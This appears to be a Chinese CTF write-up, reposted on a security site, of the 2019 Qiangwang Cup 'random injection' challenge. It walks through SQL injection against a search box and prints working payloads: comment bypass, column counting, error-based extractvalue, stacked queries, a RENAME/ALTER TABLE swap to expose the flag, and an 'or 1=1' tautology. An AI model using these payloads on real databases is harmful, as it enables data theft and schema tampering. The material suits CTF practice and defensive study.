[复现]强网杯2019随便注

admin 2025年1月11日12:36:11评论6 views字数 867阅读2分53秒阅读模式

转发文章请备注来源!!!!

0X00引言

(标题只是为了文章好看点)
唔。很久没更新了。今天乘机着晚自习空闲时间,给大家更新篇2019强网杯的随便注

0X01正文

打开网页发现有一个输入框,结合题目名字显而易见,注入就在这个搜索框中。
回手一个单引号发现sql报错(PS:我的chrome自动翻译英文)
[复现]强网杯2019随便注

经过测试,我们输入1'#发现页面返回正常,成功绕过!
[复现]强网杯2019随便注

OKey,那么我们开始尝试注入
先猜个字段数 1'order by 数字#
[复现]强网杯2019随便注

[复现]强网杯2019随便注

显而易见,字段数为2.
继续注入:
[复现]强网杯2019随便注

发现这里过滤了select等关键词。这时候我脑海中第一个想法是利用报错注入的 extractvalue函数进行注入

-1' and extractvalue(1,concat(0x1,1,version()))#

[复现]强网杯2019随便注

但是我忽然记起,还是得用上select。所以这条道走不通,我们需要换一条。这时候我选择用堆叠注入

1';show databases;#

[复现]强网杯2019随便注

1';show tables;#

[复现]强网杯2019随便注

[复现]强网杯2019随便注

[复现]强网杯2019随便注

emmm这个时候,我又陷入了一个困境。。。查数据需要用到select。这可咋办可好。
[复现]强网杯2019随便注

用了百度大法后,成功获得了方法(emm这个是之前看到的,不记得是哪个表哥发的。表哥看到了可以发我补下链接)
这里有反引号

1';RENAME TABLE words TO words1;RENAME TABLE 1919810931114514 TO
words;ALTER TABLE words CHANGE flag id VARCHAR(100) CHARACTER
SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

这串语句答底意思就是将表名word更改名字,然后把藏flag的1919810931114514改名为word,并把其下的flag与id切换
这样我们就可以通过查询id方式(默认)查flag。最后再显示表
[复现]强网杯2019随便注

最后我们只需要构造万能语句即可爆出数据

1'or 1=1#

[复现]强网杯2019随便注

0x02结尾

感觉这道题主要骚操作就在于最后将表中信息更换。成功get到一个新技巧✔

©著作权归作者所有 - source: 535yx.cn

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日12:36:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [复现]强网杯2019随便注https://cn-sec.com/archives/3619416.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息